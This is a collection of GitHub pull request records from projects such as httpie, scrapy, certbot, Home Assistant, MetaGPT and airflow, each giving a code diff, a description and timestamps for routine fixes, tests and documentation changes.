diff --git a/CHANGELOG.rst b/CHANGELOG.rst index d84119538e..c47be9d672 100644 --- a/CHANGELOG.rst +++ b/CHANGELOG.rst @@ -9,7 +9,7 @@ This project adheres to `Semantic Versioning <https://semver.org/>`_. `2.4.0-dev`_ (unreleased) ------------------------- - +* Show a ``--check-status`` warning with ``--quiet`` as well, not only when the output si redirected. (`#1026`_) * Fixed upload with ``--session`` (`#1020`_). * Fixed a missing blank line between request and response (`#1006`_). @@ -488,3 +488,4 @@ This project adheres to `Semantic Versioning <https://semver.org/>`_. .. _#963: https://github.com/httpie/httpie/issues/963 .. _#1006: https://github.com/httpie/httpie/issues/1006 .. _#1020: https://github.com/httpie/httpie/issues/1020 +.. _#1026: https://github.com/httpie/httpie/issues/1026 diff --git a/README.rst b/README.rst index 47d65bcbc6..4abf607853 100644 --- a/README.rst +++ b/README.rst @@ -1292,7 +1292,7 @@ Quiet output ------------ ``--quiet`` redirects all output that would otherwise go to ``stdout`` -and ``stderr`` (except for error messages) to ``/dev/null``. +and ``stderr`` to ``/dev/null`` (except for errors and warnings). This doesn’t affect output to a file via ``--output`` or ``--download``. .. code-block:: bash diff --git a/httpie/core.py b/httpie/core.py index 3f46603e52..c71edd2ca0 100644 --- a/httpie/core.py +++ b/httpie/core.py @@ -185,7 +185,7 @@ def request_body_read_callback(chunk: bytes): final_response = message if args.check_status or downloader: exit_status = http_status_to_exit_status(http_status=message.status_code, follow=args.follow) - if not env.stdout_isatty and exit_status != ExitStatus.SUCCESS: + if exit_status != ExitStatus.SUCCESS and (not env.stdout_isatty or args.quiet): env.log_error(f'HTTP {message.raw.status} {message.raw.reason}', level='warning') write_message(requests_message=message, env=env, args=args, with_headers=with_headers, with_body=do_write_body) diff --git a/tests/test_output.py b/tests/test_output.py index 7510408a50..d5b15e4693 100644 --- a/tests/test_output.py +++ b/tests/test_output.py @@ -54,6 +54,21 @@ def test_quiet(self, httpbin, argument_name): assert r == '' assert r.stderr == '' + def test_quiet_with_check_status_non_zero(self, httpbin): + r = http( + '--quiet', '--check-status', httpbin + '/status/500', + tolerate_error_exit_status=True, + ) + assert 'http: warning: HTTP 500' in r.stderr + + def test_quiet_with_check_status_non_zero_pipe(self, httpbin): + r = http( + '--quiet', '--check-status', httpbin + '/status/500', + tolerate_error_exit_status=True, + env=MockEnvironment(stdout_isatty=False) + ) + assert 'http: warning: HTTP 500' in r.stderr + @mock.patch('httpie.cli.argtypes.AuthCredentials._getpass', new=lambda self, prompt: 'password') def test_quiet_with_password_prompt(self, httpbin):
#1026
https://api.github.com/repos/httpie/cli/pulls/1028
2021-01-30T23:54:20Z
2021-01-30T23:58:57Z
2021-01-30T23:58:57Z
2021-03-15T07:37:38Z
858
httpie/cli
34,117
Remove a defer.returnValue call.
diff --git a/tests/test_feedexport.py b/tests/test_feedexport.py index c7d955bc74e..277555608e6 100644 --- a/tests/test_feedexport.py +++ b/tests/test_feedexport.py @@ -2299,7 +2299,7 @@ def run_and_export(self, spider_cls, settings): content[feed["format"]].append(file.read_bytes()) finally: self.tearDown() - defer.returnValue(content) + return content @defer.inlineCallbacks def assertExportedJsonLines(self, items, rows, settings=None):
Fixes #6204 :shrug:
https://api.github.com/repos/scrapy/scrapy/pulls/6205
2024-01-12T14:31:18Z
2024-01-12T17:50:41Z
2024-01-12T17:50:41Z
2024-01-15T15:16:35Z
128
scrapy/scrapy
34,428
[FAW] move coloparam setting in test code.
diff --git a/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py b/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py index 4400d6fc2034..083076532c91 100644 --- a/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py +++ b/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py @@ -67,9 +67,6 @@ def __init__(self, self.init_parameters() else: assert isinstance(_weight, ColoParameter), "initialized weight must in type of ColoParameter" - _weight.process_group = ProcessGroup(tp_degree=self.world_size) - _weight.set_tensor_spec(ShardSpec(dims=[-1], num_partitions=[self.world_size]), - ComputeSpec(ComputePattern.TP1D)) self._weight = _weight @property diff --git a/tests/test_tensor/ops/test_cache_embedding.py b/tests/test_tensor/ops/test_cache_embedding.py index ac5b3bc40853..8471975dfc9e 100644 --- a/tests/test_tensor/ops/test_cache_embedding.py +++ b/tests/test_tensor/ops/test_cache_embedding.py @@ -8,11 +8,9 @@ import colossalai from colossalai.utils import free_port from colossalai.testing import rerun_if_address_is_in_use -from colossalai.tensor import ColoParameter +from colossalai.tensor import ColoParameter, ProcessGroup, ShardSpec, ComputePattern, ComputeSpec from colossalai.nn._ops.cache_embedding import CachedParamMgr, FreqAwareEmbeddingBag, ParallelFreqAwareEmbeddingBag -from colossalai.nn._ops.cache_embedding import CachedParamMgr, FreqAwareEmbeddingBag - NUM_EMBED, EMBED_DIM = 10, 8 BATCH_SIZE = 8 @@ -161,6 +159,11 @@ def run_parallel_freq_aware_embed(rank, world_size): weight = torch.rand(num_embed, embed_dim) coloweight = ColoParameter(weight.clone().detach().cpu(), requires_grad=False) + # initialize the tensor spec for the embedding weight parameter, + # which is an ColoParameter. + coloweight.process_group = ProcessGroup(tp_degree=world_size) + coloweight.set_tensor_spec(ShardSpec(dims=[-1], num_partitions=[world_size]), ComputeSpec(ComputePattern.TP1D)) + model = ParallelFreqAwareEmbeddingBag.from_pretrained(coloweight, include_last_offset=True, freeze=False,
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/1429
2022-08-10T06:12:01Z
2022-08-10T06:31:53Z
2022-08-10T06:31:53Z
2022-08-10T06:31:53Z
557
hpcaitech/ColossalAI
10,983
fix benchmark
diff --git a/test_tipc/benchmark_train.sh b/test_tipc/benchmark_train.sh index d5b4e2f11a..e3e4d627fa 100644 --- a/test_tipc/benchmark_train.sh +++ b/test_tipc/benchmark_train.sh @@ -135,7 +135,6 @@ else batch_size=${params_list[1]} batch_size=`echo ${batch_size} | tr -cd "[0-9]" ` precision=${params_list[2]} - # run_process_type=${params_list[3]} run_mode=${params_list[3]} device_num=${params_list[4]} IFS=";" @@ -160,10 +159,9 @@ for batch_size in ${batch_size_list[*]}; do gpu_id=$(set_gpu_id $device_num) if [ ${#gpu_id} -le 1 ];then - run_process_type="SingleP" log_path="$SAVE_LOG/profiling_log" mkdir -p $log_path - log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_profiling" + log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_profiling" func_sed_params "$FILENAME" "${line_gpuid}" "0" # sed used gpu_id # set profile_option params tmp=`sed -i "${line_profile}s/.*/${profile_option}/" "${FILENAME}"` @@ -179,8 +177,8 @@ for batch_size in ${batch_size_list[*]}; do speed_log_path="$SAVE_LOG/index" mkdir -p $log_path mkdir -p $speed_log_path - log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_log" - speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_speed" + log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_log" + speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_speed" func_sed_params "$FILENAME" "${line_profile}" "null" # sed profile_id as null cmd="bash test_tipc/test_train_inference_python.sh ${FILENAME} benchmark_train > ${log_path}/${log_name} 2>&1 " echo $cmd @@ -191,13 +189,12 @@ for batch_size in ${batch_size_list[*]}; do eval "cat ${log_path}/${log_name}" # parser log - _model_name="${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}" + _model_name="${model_name}_bs${batch_size}_${precision}_${run_mode}" cmd="${python} ${BENCHMARK_ROOT}/scripts/analysis.py --filename ${log_path}/${log_name} \ --speed_log_file '${speed_log_path}/${speed_log_name}' \ --model_name ${_model_name} \ --base_batch_size ${batch_size} \ --run_mode ${run_mode} \ - --run_process_type ${run_process_type} \ --fp_item ${precision} \ --keyword ips: \ --skip_steps 2 \ @@ -211,13 +208,12 @@ for batch_size in ${batch_size_list[*]}; do else IFS=";" unset_env=`unset CUDA_VISIBLE_DEVICES` - run_process_type="MultiP" log_path="$SAVE_LOG/train_log" speed_log_path="$SAVE_LOG/index" mkdir -p $log_path mkdir -p $speed_log_path - log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_log" - speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_speed" + log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_log" + speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_speed" func_sed_params "$FILENAME" "${line_gpuid}" "$gpu_id" # sed used gpu_id func_sed_params "$FILENAME" "${line_profile}" "null" # sed --profile_option as null cmd="bash test_tipc/test_train_inference_python.sh ${FILENAME} benchmark_train > ${log_path}/${log_name} 2>&1 " @@ -228,14 +224,13 @@ for batch_size in ${batch_size_list[*]}; do export model_run_time=$((${job_et}-${job_bt})) eval "cat ${log_path}/${log_name}" # parser log - _model_name="${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}" + _model_name="${model_name}_bs${batch_size}_${precision}_${run_mode}" cmd="${python} ${BENCHMARK_ROOT}/scripts/analysis.py --filename ${log_path}/${log_name} \ --speed_log_file '${speed_log_path}/${speed_log_name}' \ --model_name ${_model_name} \ --base_batch_size ${batch_size} \ --run_mode ${run_mode} \ - --run_process_type ${run_process_type} \ --fp_item ${precision} \ --keyword ips: \ --skip_steps 2 \
fix benchmark benchmark中删除 run_process_type 区分,故删掉 benchmark_train.sh 中相关内容
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/5671
2022-03-09T07:56:16Z
2022-03-09T10:54:05Z
2022-03-09T10:54:05Z
2022-03-09T10:54:05Z
1,212
PaddlePaddle/PaddleOCR
41,943
Update leauto_upgrades with tests from #5402
diff --git a/tests/letstest/scripts/test_leauto_upgrades.sh b/tests/letstest/scripts/test_leauto_upgrades.sh index 51472f2e6cb..355fead2e90 100755 --- a/tests/letstest/scripts/test_leauto_upgrades.sh +++ b/tests/letstest/scripts/test_leauto_upgrades.sh @@ -65,6 +65,7 @@ iQIDAQAB " if [ $(python -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -eq 26 ]; then + RUN_PYTHON3_TESTS=1 if command -v python3; then echo "Didn't expect Python 3 to be installed!" exit 1 @@ -85,11 +86,25 @@ if [ $(python -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -eq 26 ]; exit 1 fi unset VENV_PATH - EXPECTED_VERSION=$(grep -m1 LE_AUTO_VERSION certbot-auto | cut -d\" -f2) - if ! ./cb-auto -v --debug --version -n 2>&1 | grep "$EXPECTED_VERSION" ; then - echo "Certbot didn't upgrade as expected!" - exit 1 - fi +fi + +if ./letsencrypt-auto -v --debug --version | grep "WARNING: couldn't find Python" ; then + echo "Had problems checking for updates!" + exit 1 +fi + +EXPECTED_VERSION=$(grep -m1 LE_AUTO_VERSION certbot-auto | cut -d\" -f2) +if ! /opt/eff.org/certbot/venv/bin/letsencrypt --version 2>&1 | grep "$EXPECTED_VERSION" ; then + echo upgrade appeared to fail + exit 1 +fi + +if ! diff letsencrypt-auto letsencrypt-auto-source/letsencrypt-auto ; then + echo letsencrypt-auto and letsencrypt-auto-source/letsencrypt-auto differ + exit 1 +fi + +if [ "$RUN_PYTHON3_TESTS" = 1 ]; then if ! command -v python3; then echo "Python3 wasn't properly installed" exit 1 @@ -98,11 +113,7 @@ if [ $(python -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -eq 26 ]; echo "Python3 wasn't used in venv!" exit 1 fi -elif ! ./letsencrypt-auto -v --debug --version || ! diff letsencrypt-auto letsencrypt-auto-source/letsencrypt-auto ; then - echo upgrade appeared to fail - exit 1 fi - echo upgrade appeared to be successful if [ "$(tools/readlink.py ${XDG_DATA_HOME:-~/.local/share}/letsencrypt)" != "/opt/eff.org/certbot/venv" ]; then
I only put these in the comments of #5402 due to merge conflicts with #5392. These tests should just add more testing to the current version in `master`, but if this isn't merged by the time I'm testing the release, I'll test against both versions of the script.
https://api.github.com/repos/certbot/certbot/pulls/5407
2018-01-10T20:36:06Z
2018-02-07T01:01:59Z
2018-02-07T01:01:59Z
2018-02-07T01:07:39Z
698
certbot/certbot
34
Add dot_color to BulletedList
diff --git a/manimlib/mobject/svg/tex_mobject.py b/manimlib/mobject/svg/tex_mobject.py index 60b299e6d1..20f79afbeb 100644 --- a/manimlib/mobject/svg/tex_mobject.py +++ b/manimlib/mobject/svg/tex_mobject.py @@ -257,6 +257,7 @@ class BulletedList(TextMobject): CONFIG = { "buff": MED_LARGE_BUFF, "dot_scale_factor": 2, + "dot_color": WHITE, # Have to include because of handle_multiple_args implementation "template_tex_file_body": TEMPLATE_TEXT_FILE_BODY, "alignment": "", @@ -266,7 +267,7 @@ def __init__(self, *items, **kwargs): line_separated_items = [s + "\\\\" for s in items] TextMobject.__init__(self, *line_separated_items, **kwargs) for part in self: - dot = TexMobject("\\cdot").scale(self.dot_scale_factor) + dot = TexMobject("\\cdot", color=self.dot_color).scale(self.dot_scale_factor) dot.next_to(part[0], LEFT, SMALL_BUFF) part.add_to_back(dot) self.arrange(
I felt like using only white in BulletedList wasn't visually appealing, so the ability to change the color of the bullet seemed useful. ```python l = BulletedList("Item 1", "Item 2", "Item 3", dot_color=BLUE) ``` produces <img width="366" alt="image" src="https://user-images.githubusercontent.com/31397379/83178468-65864d00-a0d5-11ea-8fc2-2cd665def137.png">
https://api.github.com/repos/3b1b/manim/pulls/1112
2020-05-28T18:22:16Z
2020-09-30T15:27:29Z
2020-09-30T15:27:29Z
2020-09-30T15:27:30Z
277
3b1b/manim
18,564
Fix missing leak sensor battery expose
diff --git a/homeassistant/components/yolink/sensor.py b/homeassistant/components/yolink/sensor.py index 7c578fbaa73924..4679c3e670b7cf 100644 --- a/homeassistant/components/yolink/sensor.py +++ b/homeassistant/components/yolink/sensor.py @@ -22,6 +22,7 @@ ATTR_COORDINATORS, ATTR_DEVICE_CO_SMOKE_SENSOR, ATTR_DEVICE_DOOR_SENSOR, + ATTR_DEVICE_LEAK_SENSOR, ATTR_DEVICE_LOCK, ATTR_DEVICE_MANIPULATOR, ATTR_DEVICE_MOTION_SENSOR, @@ -61,6 +62,7 @@ class YoLinkSensorEntityDescription( BATTERY_POWER_SENSOR = [ ATTR_DEVICE_DOOR_SENSOR, + ATTR_DEVICE_LEAK_SENSOR, ATTR_DEVICE_MOTION_SENSOR, ATTR_DEVICE_TH_SENSOR, ATTR_DEVICE_VIBRATION_SENSOR,
<!-- You are amazing! Thanks for contributing to our project! Please, DO NOT DELETE ANY TEXT from this template! (unless instructed). --> ## Breaking change <!-- If your PR contains a breaking change for existing users, it is important to tell them what breaks, how to make it work again and why we did this. This piece of text is published with the release notes, so it helps if you write it towards our users, not us. Note: Remove this section if this PR is NOT a breaking change. --> ## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [ ] Dependency upgrade - [x] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Breaking change (fix/feature causing existing functionality to break) - [ ] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [x] Local tests pass. **Your PR cannot be merged unless tests pass** - [x] There is no commented out code in this PR. - [x] I have followed the [development checklist][dev-checklist] - [x] The code has been formatted using Black (`black --fast homeassistant tests`) - [x] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. The integration reached or maintains the following [Integration Quality Scale][quality-scale]: <!-- The Integration Quality Scale scores an integration on the code quality and user experience. Each level of the quality scale consists of a list of requirements. We highly recommend getting your integration scored! --> - [ ] No score or internal - [ ] 🥈 Silver - [ ] 🥇 Gold - [ ] 🏆 Platinum <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html [manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html [quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html [docs-repository]: https://github.com/home-assistant/home-assistant.io
https://api.github.com/repos/home-assistant/core/pulls/74084
2022-06-28T02:13:37Z
2022-06-28T06:39:12Z
2022-06-28T06:39:12Z
2022-06-29T07:01:56Z
192
home-assistant/core
39,256
fix ContextMixin ut error
diff --git a/metagpt/context_mixin.py b/metagpt/context_mixin.py index 060150f4d..59daa692f 100644 --- a/metagpt/context_mixin.py +++ b/metagpt/context_mixin.py @@ -33,20 +33,16 @@ class ContextMixin(BaseModel): private_llm: Optional[BaseLLM] = Field(default=None, exclude=True) @model_validator(mode="after") - def validate_extra(self): - self._process_extra(**(self.model_extra or {})) + def validate_context_mixin_extra(self): + self._process_context_mixin_extra() return self - def _process_extra( - self, - context: Optional[Context] = None, - config: Optional[Config] = None, - llm: Optional[BaseLLM] = None, - ): + def _process_context_mixin_extra(self): """Process the extra field""" - self.set_context(context) - self.set_config(config) - self.set_llm(llm) + kwargs = self.model_extra or {} + self.set_context(kwargs.pop("context", None)) + self.set_config(kwargs.pop("config", None)) + self.set_llm(kwargs.pop("llm", None)) def set(self, k, v, override=False): """Set attribute""" diff --git a/metagpt/roles/role.py b/metagpt/roles/role.py index 5da39f80f..c098f95af 100644 --- a/metagpt/roles/role.py +++ b/metagpt/roles/role.py @@ -23,7 +23,7 @@ from __future__ import annotations from enum import Enum -from typing import Any, Iterable, Optional, Set, Type, Union +from typing import Iterable, Optional, Set, Type, Union from pydantic import BaseModel, ConfigDict, Field, SerializeAsAny, model_validator @@ -121,7 +121,7 @@ def history(self) -> list[Message]: class Role(SerializationMixin, ContextMixin, BaseModel): """Role/Agent""" - model_config = ConfigDict(arbitrary_types_allowed=True, extra="ignore") + model_config = ConfigDict(arbitrary_types_allowed=True, extra="allow") name: str = "" profile: str = "" @@ -149,16 +149,21 @@ class Role(SerializationMixin, ContextMixin, BaseModel): __hash__ = object.__hash__ # support Role as hashable type in `Environment.members` - def __init__(self, **data: Any): + @model_validator(mode="after") + def validate_role_extra(self): + self._process_role_extra() + return self + + def _process_role_extra(self): self.pydantic_rebuild_model() - super().__init__(**data) + kwargs = self.model_extra or {} if self.is_human: self.llm = HumanProvider(None) self._check_actions() self.llm.system_prompt = self._get_prefix() - self._watch(data.get("watch") or [UserRequirement]) + self._watch(kwargs.pop("watch", [UserRequirement])) if self.latest_observed_msg: self.recovered = True
**Features** - fix ContextMixin ut error **Result** ![1706861820441](https://github.com/geekan/MetaGPT/assets/60704484/1b296512-f78d-4e60-a193-d2efcfe23000)
https://api.github.com/repos/geekan/MetaGPT/pulls/827
2024-02-02T08:17:56Z
2024-02-02T09:10:39Z
2024-02-02T09:10:39Z
2024-02-02T09:10:39Z
724
geekan/MetaGPT
16,796
fix regex in test_black.py
diff --git a/tests/test_black.py b/tests/test_black.py index 3d5d3982817..4267c6110a9 100644 --- a/tests/test_black.py +++ b/tests/test_black.py @@ -31,7 +31,7 @@ import click import pytest -import regex as re +import re from click import unstyle from click.testing import CliRunner from pathspec import PathSpec @@ -70,7 +70,7 @@ R = TypeVar("R") # Match the time output in a diff, but nothing else -DIFF_TIME = re.compile(r"\t[\d-:+\. ]+") +DIFF_TIME = re.compile(r"\t[\d\-:+\. ]+") @contextmanager
Trying to get rid of the regex dependency, but found instead that we were incorrectly using a character range in this regex.
https://api.github.com/repos/psf/black/pulls/2643
2021-11-25T14:20:28Z
2021-11-26T02:34:19Z
2021-11-26T02:34:19Z
2021-11-26T02:34:22Z
166
psf/black
24,177
Adds Akamai
diff --git a/diagrams/saas/cdn.py b/diagrams/saas/cdn.py index dec52654f..3733621da 100644 --- a/diagrams/saas/cdn.py +++ b/diagrams/saas/cdn.py @@ -8,6 +8,10 @@ class _Cdn(_Saas): _icon_dir = "resources/saas/cdn" +class Akamai(_Cdn): + _icon = "akamai.png" + + class Cloudflare(_Cdn): _icon = "cloudflare.png" diff --git a/docs/nodes/saas.md b/docs/nodes/saas.md index e42f106a7..607fa09c0 100644 --- a/docs/nodes/saas.md +++ b/docs/nodes/saas.md @@ -17,6 +17,7 @@ Node classes list of saas provider. ## saas.cdn +- **diagrams.saas.cdn.Akamai** - **diagrams.saas.cdn.Cloudflare** ## saas.chat diff --git a/resources/saas/cdn/akamai.png b/resources/saas/cdn/akamai.png new file mode 100644 index 000000000..2c008ed2a Binary files /dev/null and b/resources/saas/cdn/akamai.png differ
https://api.github.com/repos/mingrammer/diagrams/pulls/267
2020-09-08T22:27:07Z
2020-09-14T11:56:03Z
2020-09-14T11:56:02Z
2020-09-14T11:56:03Z
314
mingrammer/diagrams
52,603
Fix encoding issue in test_response_reason_unicode_fallback
diff --git a/tests/test_requests.py b/tests/test_requests.py index e77e024a7d..24f296f000 100755 --- a/tests/test_requests.py +++ b/tests/test_requests.py @@ -1026,13 +1026,13 @@ def test_response_reason_unicode_fallback(self): # check raise_status falls back to ISO-8859-1 r = requests.Response() r.url = 'some url' - reason = b'Komponenttia ei l\xf6ydy' - r.reason = reason + reason = u'Komponenttia ei löydy' + r.reason = reason.encode('latin-1') r.status_code = 500 r.encoding = None with pytest.raises(requests.exceptions.HTTPError) as e: r.raise_for_status() - assert reason.decode('latin-1') in str(e) + assert reason in e.value.args[0] def test_response_chunk_size_type(self): """Ensure that chunk_size is passed as None or an integer, otherwise
`test_response_reason_unicode_fallback` is currently failing in Python 2. The original proposed fix in #3557 unfortunately didn't address the underlying issue. While this patch should fix the test now, it may be worth taking a brief moment to discuss how we envision the original PR #3554 working. Currently an error retrieved from an `except` clause can't be cast as `str`, `unicode`, written to a file, or easily decoded in Python 2. It prints to the console fine, but that's about it. This seems like a semi-serious issue for making this exception usable. I need to run a few more tests this evening or tomorrow, so we can sit on this for the weekend unless someone has some obvious insight I'm missing.
https://api.github.com/repos/psf/requests/pulls/3576
2016-09-16T16:23:45Z
2016-09-20T14:48:40Z
2016-09-20T14:48:40Z
2021-09-08T02:10:16Z
232
psf/requests
32,813
DOC add target_names in LFW fetchers
diff --git a/sklearn/datasets/_lfw.py b/sklearn/datasets/_lfw.py index be01ae6279e27..33c1234f907b7 100644 --- a/sklearn/datasets/_lfw.py +++ b/sklearn/datasets/_lfw.py @@ -308,13 +308,15 @@ def fetch_lfw_people( target : numpy array of shape (13233,) Labels associated to each face image. Those labels range from 0-5748 and correspond to the person IDs. + target_names : numpy array of shape (5749,) + Names of all persons in the dataset. + Position in array corresponds to the person ID in the target array. DESCR : str Description of the Labeled Faces in the Wild (LFW) dataset. (data, target) : tuple if ``return_X_y`` is True .. versionadded:: 0.20 - """ lfw_home, data_folder_path = _check_fetch_lfw( data_home=data_home, funneled=funneled, download_if_missing=download_if_missing @@ -489,6 +491,9 @@ def fetch_lfw_pairs( target : numpy array of shape (2200,). Shape depends on ``subset``. Labels associated to each pair of images. The two label values being different persons or the same person. + target_names : numpy array of shape (2,) + Explains the target values of the target array. + 0 corresponds to "Different person", 1 corresponds to "same person". DESCR : str Description of the Labeled Faces in the Wild (LFW) dataset. """
Follow-up of #23582 We need to target `main` instead of `1.1.X`.
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/23795
2022-06-29T12:46:33Z
2022-06-29T13:56:48Z
2022-06-29T13:56:48Z
2022-06-29T13:56:48Z
369
scikit-learn/scikit-learn
46,503
remove redundant else block in DatabricksExecutionTrigger
diff --git a/airflow/providers/databricks/triggers/databricks.py b/airflow/providers/databricks/triggers/databricks.py index e5e56cc0ffa7d..2bd65a0d932b9 100644 --- a/airflow/providers/databricks/triggers/databricks.py +++ b/airflow/providers/databricks/triggers/databricks.py @@ -90,11 +90,11 @@ async def run(self): } ) return - else: - self.log.info( - "run-id %s in run state %s. sleeping for %s seconds", - self.run_id, - run_state, - self.polling_period_seconds, - ) - await asyncio.sleep(self.polling_period_seconds) + + self.log.info( + "run-id %s in run state %s. sleeping for %s seconds", + self.run_id, + run_state, + self.polling_period_seconds, + ) + await asyncio.sleep(self.polling_period_seconds)
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <!-- Thank you for contributing! Please make sure that your code changes are covered with tests. And in case of new features or big changes remember to adjust the documentation. Feel free to ping committers for the review! In case of an existing issue, reference it using one of the following: closes: #ISSUE related: #ISSUE How to write a good git commit message: http://chris.beams.io/posts/git-commit/ --> <!-- Please keep an empty line above the dashes. --> --- **^ Add meaningful description above** Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/contributing-docs/05_pull_requests.rst#pull-request-guidelines)** for more information. In case of fundamental code changes, an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvement+Proposals)) is needed. In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x). In case of backwards incompatible changes please leave a note in a newsfragment file, named `{pr_number}.significant.rst` or `{issue_number}.significant.rst`, in [newsfragments](https://github.com/apache/airflow/tree/main/newsfragments).
https://api.github.com/repos/apache/airflow/pulls/38397
2024-03-22T04:33:44Z
2024-03-22T10:36:08Z
2024-03-22T10:36:08Z
2024-03-22T10:36:08Z
232
apache/airflow
14,215
[doc] add potential solution for OOM in llama2 example
diff --git a/examples/language/llama2/README.md b/examples/language/llama2/README.md index 483eae88ae32..16b263c1322e 100644 --- a/examples/language/llama2/README.md +++ b/examples/language/llama2/README.md @@ -149,6 +149,9 @@ Finally, run the following command to start training: ```bash bash gemini.sh ``` + +If you encounter out-of-memory(OOM) error during training with script `gemini.sh`, changing to script `gemini_auto.sh` might be a solution, since gemini_auto will set a upper limit on GPU memory usage through offloading part of the model parameters and optimizer states back to CPU memory. But there's a trade-off: `gemini_auto.sh` will be a bit slower, since more data are transmitted between CPU and GPU. + #### c. Results If you run the above command successfully, you will get the following results: `max memory usage: 55491.10 MB, throughput: 24.26 samples/s, TFLOPS/GPU: 167.43`.
## 📌 Checklist before creating the PR - [ ] I have created an issue for this PR for traceability - [x] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description` - [x] I have added relevant tags if possible for us to better distinguish different PRs ## 🚨 Issue number > Link this PR to your issue with words like fixed to automatically close the linked issue upon merge > > e.g. `fixed #1234`, `closed #1234`, `resolved #1234` Many users have reported OOM bug when running llama example script, such as #4578 ## 📝 What does this PR do? > Summarize your work here. > if you have any plots/diagrams/screenshots/tables, please attach them here. Add explanation on how to solve the OOM error. ## 💥 Checklist before requesting a review - [x] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue)) - [x] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible - [x] I have performed a self-review of my code - [x] I have added thorough tests. - [x] I have added docstrings for all the functions/methods I implemented ## ⭐️ Do you enjoy contributing to Colossal-AI? - [x] 🌝 Yes, I do. - [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/4699
2023-09-12T15:19:15Z
2023-09-13T02:43:30Z
2023-09-13T02:43:30Z
2023-09-13T06:22:45Z
247
hpcaitech/ColossalAI
11,300
update metric
